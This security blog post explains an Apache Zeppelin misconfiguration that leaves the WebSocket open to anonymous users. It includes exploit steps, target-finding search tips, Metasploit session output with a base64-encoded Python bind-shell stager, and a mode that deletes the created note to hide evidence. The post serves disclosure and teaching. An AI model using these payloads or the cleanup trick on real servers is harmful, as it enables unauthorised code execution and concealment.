Apache Zeppelin Vulnerability + Metasploit

Apache Zeppelin is a “Web-based notebook that enables data-driven, interactive data analytics and collaborative documents…” which is very similar to Jupyter notebook. Notebook servers offer polyglot Remote Code Execution (RCE) by design, so gaining access to one would make pwning the entire Hadoop cluster and all its data fairly simple.

How would you like your RCE?
How would you like your RCE?

It’s interesting because AWS Elastic MapReduce (EMR) Hadoop clusters and the like tend to have it installed, so it’s becoming quite prevalent among data-science teams who may not be security trained.

From a honeypot EMR cluster with all ports exposed to the internet, I found it takes about 6 minutes before the YARN ResourceManager on port 8088 is found by scanners. YARN allows commands to be submitted via a REST API, which will then be scheduled to run on the cluster. Run-of-the-mill Mirai-variant malware was downloaded and the cluster nodes were recruited to take part in DDoS attacks. They weren’t super successful as they kept hitting the memory limits and getting killed, but still tried to send a lot of UDP traffic.

Moral of the story: Don’t expose your EMR clusters to the internet as pretty much every port except SSH either leaks data or allows unauthenticated RCE.

But anyway, onto Zeppelin.

By default it’s completely unauthenticated, but I assume people who want to expose it publicly will turn on the inbuilt authentication. Which is fine if they follow the instructions. However, there are two steps:

  1. Enable Apache Shiro authentication. Basically modifying the provided template conf/shiro.ini config file and entering some plaintext usernames and passwords. You can alternatively configure LDAP / AD.

  2. Secure the Websocket channel. Set zeppelin.anonymous.allowed to false in conf/zeppelin-site.xml. You will then need to be logged in and retrieve a ticket from /api/security/ticket before using the WebSocket.

It seems that a widespread misconfiguration is to perform only step 1. After step 1, it looks from the web interface as if Zeppelin is sufficiently secure. You will see a Login button in the top-right corner, and you won’t be able to see any of the notebooks through the web interface until you login.

Everything looks secure
Everything looks secure

However, the WebSocket’s xml config still has anonymous access allowed, which gives complete control.

You can check for this, by sending the following payload to the Websocket at /ws:


If you get a response, the service is vulnerable.

Is this a common misconfiguration?

The shodan search zeppelin “WITHOUT WARRANTIES OR CONDITIONS” should find Apache Zeppelin instances. I only found one which wasn’t vulnerable. Scanning the AWS IP range on a plausible port (8890) will find more temporary instances backed by EMR clusters.

How the exploit works

  1. Send op NEW_NOTE
  2. Wait for NEW_NOTE response with note ID
  4. Wait for PARAGRAPH_ADDED with paragraph ID
  5. Send RUN_PARAGRAPH with the payload and language
  6. Receive polling updates with status: PENDING, RUNNING, FINISHED, ERROR.

There are a load of different interpreters. The datascience interpreters might not have been configured though, so the simplest will be to use python or sh to get a shell.

There do exist systems where only the spark interpreter is available. In that case, script kiddies will have to learn scala!

Poor script kiddie can't figure out how to mine monero
Poor script kiddie can’t figure out how to mine monero

Run shell commands from scala

import scala.sys.process._
print("ps waxf" !!)

Scala is such a messed up language.


I thought this would be a good time to finally learn how to write a Metasploit module.

We have a check command which tells you if a service is vulnerable

msf5 exploit(ws) > set rhosts
rhosts =>
msf5 exploit(ws) > set rport 1234
rport => 1234
msf5 exploit(ws) > check

[+] - WebSocket connected
[*] - Interpreters: spark,md,angular,sh,livy,alluxio,file,psql,flink,python,ignite,lens,cassandra,geode,kylin,elasticsearch,scalding,jdbc,hbase,bigquery,beam,pig,scio,groovy,neo4j
[+] - The target is vulnerable.

And then an exploit command which takes a payload (here a staged Meterpreter bind shell), executes it and gets a shell.

msf5 exploit(ws) > set payload python/meterpreter/bind_tcp
payload => python/meterpreter/bind_tcp
msf5 exploit(ws) > exploit

[+] - WebSocket connected
[+] - Created note 2EB1RJQH9 wyhuqCxyHpGT
[+] - Created paragraph 20190511-183457_1324276293
[*] - {"op":"PARAGRAPH","data":{"paragraph":{"text":"import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKYj1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpiLmJpbmQoKCcwLjAuMC4wJyw0NDQ0KSkKYi5saXN0ZW4oMSkKcyxhPWIuYWNjZXB0KCkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))","user":"anonymous","dateUpdated":"2019-05-11T18:35:00+0000","config":{"colWidth":12.0,"editorMode":"ace/mode/python","fontSize":9.0,"enabled":true,"results":{},"editorSetting":{"language":"python","editOnDblClick":false,"completionSupport":true}},"settings":{"params":{},"forms":{}},"apps":[],"jobName":"paragraph_1557599697676_1276214488","id":"20190511-183457_1324276293","dateCreated":"2019-05-11T18:34:57+0000","dateStarted":"2019-05-11T18:35:00+0000","status":"RUNNING","errorMessage":"","progressUpdateIntervalMs":500}},"ticket":"anonymous","principal":"anonymous","roles":""}
[*] Started bind TCP handler against
[*] Sending stage (53770 bytes) to
[*] Meterpreter session 4 opened ( -> at 2019-05-11 14:22:06 -0400

Another mode is to send a specific command and wait for it to COMPLETE. It will then sneakily delete the evidence.

msf5 exploit(ws) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python payload
   1   Command payload

msf5 exploit(ws) > set target 1
target => 1
msf5 exploit(ws) > set payload generic/custom
payload => generic/custom
msf5 exploit(ws) > set COMPLETE true
COMPLETE => true
msf5 exploit(ws) > set payloadstr "ps aux"
payloadstr => ps aux
msf5 exploit(ws) > exploit

[+] - WebSocket connected
[+] - Created note 2EATUUSED QFgMcsIJSQzHvGbENw
[+] - Created paragraph 20190511-231105_1295465714
root         1  0.0  0.0   4364    12 ?        Ss   18:26   0:00 /usr/bin/tini -- bin/zeppelin.sh
root         6  0.3  5.2 4671604 420016 ?      Sl   18:26   1:00 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -Dfile.encoding=UTF-8 -Xms1024m -Xmx1024m -XX:MaxPermSize=512m -Dlog4j.configuration=file:///zeppelin/conf/log4j.properties -Dzeppelin.log.file=/zeppelin/logs/zeppelin--04c5df9b52d5.log -cp ::/zeppelin/lib/interpreter/*:/zeppelin/lib/*:/zeppelin/*::/zeppelin/conf org.apache.zeppelin.server.ZeppelinServer
root        84  0.0  0.0  19764   168 ?        S    18:29   0:00 /bin/bash /zeppelin/bin/interpreter.sh -d /zeppelin/interpreter/python -c -p 35004 -r : -l /zeppelin/local-repo/python -g python
root       295  0.0  0.4 594692 38996 ?        Ssl  18:35   0:03 /opt/conda/bin/python -m ipykernel_launcher -f /tmp/tmpMJSdvG.json
root       310  0.0  0.0  19904   784 pts/1    Ss+  18:40   0:00 bash
root       367  0.0  0.0  36084  3112 ?        R    23:11   0:00 ps aux

[*] - Deleting note 2EATUUSED QFgMcsIJSQzHvGbENw
[*] Exploit completed, but no session was created.

It’s quite fun. I did find the process of writing a module annoying as I didn’t find the documentation or examples sufficient.

In the case of a shell session, I might only want to delete the note after I’ve finished with the session. Really I just want a separate command which takes a notebook ID and deletes it in case of error. However, I wasn’t sure how to do that. Maybe it would require writing an auxiliary module? Or maybe this just shows the limitation of Metasploit exploits if the task isn’t just a plug-and-play shell.

Since I don’t think you can add a ruby gem to a module without forking metasploit, I cobbled together a ruby websockets client based on code from Pusher blog. Fun. To be honest, I might have been better off writing my own code outside Metasploit, but it’s good for me to understand how the module system works. Since WebSockets work cross-origin, it could even be a webpage where you input the host and port.

Anyway, module code is available as a Gist: apache_zeppelin_websocket.rb. To install put it in .msf4/modules/exploits/. Don’t use it for evil.

Update: Play around

I set some challenges including a vulnerable Zeppelin for a CTF. You can run a local copy to play around: bcaller/sectalks-lon0x24-ctf